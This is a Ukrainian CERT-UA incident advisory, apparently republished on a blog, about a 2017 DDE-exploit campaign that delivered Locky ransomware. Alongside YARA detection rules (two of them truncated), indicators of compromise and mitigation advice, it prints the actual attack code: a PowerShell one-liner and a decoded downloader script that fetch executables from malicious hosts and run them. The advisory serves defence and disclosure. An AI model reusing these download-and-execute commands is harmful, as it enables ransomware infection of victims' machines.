Кібератака. Розповсюдження шифрувальника Locky через DDE-атаку (попередній аналіз)
В атаці 24.10.2017 на деякі об’єкти інфраструктури України використовувалася техніка DDE, яка активовувала виконання шкідливого коду на комп’ютері користувача.
Команді CERT-UA було надіслано для аналізу файл:
Invoice_file_916096.doc
36170f61b5c6e2c311a379704329237d
https://www.virustotal.com/#/file/99b695b3d2ce9b0440ce7526fea59f7a4851d83d9a9d9a6cf906417068bc7524/community
Файл для подальшої експлуатації використовув DDE-вразливість (CVE-2017-11826)
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11826
Виявити DDE-атаку можливо за допомогою наступної YARA-сигнатури:
YARA rules Office DDE
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
rule Office_DDEAUTO_field {
strings:
$a = /
condition:
$a
}
rule Office_DDE_field {
strings:
$a = /
condition:
$a
}
rule Office_OLE_DDEAUTO {
strings:
$a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}
rule Office_OLE_DDE {
strings:
$a = /\x13\s*DDE\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}
В результаті активації користувачем ole-гіперпосилання активовувався powershell-скрипт:
cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(‘http://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr (PID: 2872, Additional Context: new-object ((([Net.WebRequest]::Create(‘hxxp://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream()).ReadToEnd();;)
Даний скрипт підвантажував на систему користовувача закодовані base64-алгоритмом дані, а саме:
DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdABhAHQAaQBhAG4AYQBkAGUAY…
Результат декодування даних:
$urls = «http://tatianadecastelbajac.fr/kjhgFG»,»http://video.rb-webdev.de/kjhgFG»,»http://themclarenfamily.com/kjhgFG»
foreach($url in $urls){
Try
{
Write-Host $url
$fp = «$env:temp\heropad64.exe»
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}
Скрипт підвантажував на систему з одного з доступних на момент активації url адрес завантажувача з назвою heropad64.exe
(https://www.virustotal.com/ru/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/), який в подальшому підвантажував на комп’ютер користувача шифрувальника файлів Locky.
Файл heropad64.exe підвантажував шифрувальника файлів Locky з наступного url:
hxxp://webhotell.enivest.no/cuYT39.enc
Дані пізніше розшифровувалися та збиралися в MZ/PE файл (https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/)
Командно-контрольний центр шифрувальника:
hxxp://gdiscoun.org
Індикатори компрометації:
hxxp://urcho.com/JHGGsdsw6
hxxp://tatianadecastelbajac.fr/kjhgFG
hxxp://video.rb-webdev.de/kjhgFG
hxxp://themclarenfamily.com/kjhgFG
hxxp://webhotell.enivest.no/cuYT39.enc
hxxp://gdiscoun.org
Рекомендації CERT—UA:
- Заблокувати доступ до зазначених посилань.
- Встановити оновлення Windows, які усувають вразливість DDE в Microsoft Office (CVE-2017-11826). (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826)
- Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
- Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
- Не працювати під правами адміністратора.
- Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
- Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
Команда реагування на комп’ютерні надзвичайні події України CERT-UA Державної служби спеціального зв’язку та захисту інформації України працює цілодобово для надання консультацій та допомоги щодо усунення наслідків або попередження кібератаки з використанням шифрувальника файлів. тел. 281-88-25, 281-88-05, email: cert@cert.gov.ua
Бухгалтер 911 наголошує: зміст авторських матеріалів може не співпадати з політикою та точкою зору редакції. Серед авторів матеріалів, що публікуються, є не лише представники редакційної команди.
Викладена інформація в конкретній публікації відображає позицію автора. Редакція не втручається в авторські матеріали, не редагує тексти, тож не несе відповідальності за їх зміст.
Блоги 
 (1).jpg?v=1710160023)
.jpg?v=1710191819)
.jpg?v=1709910824)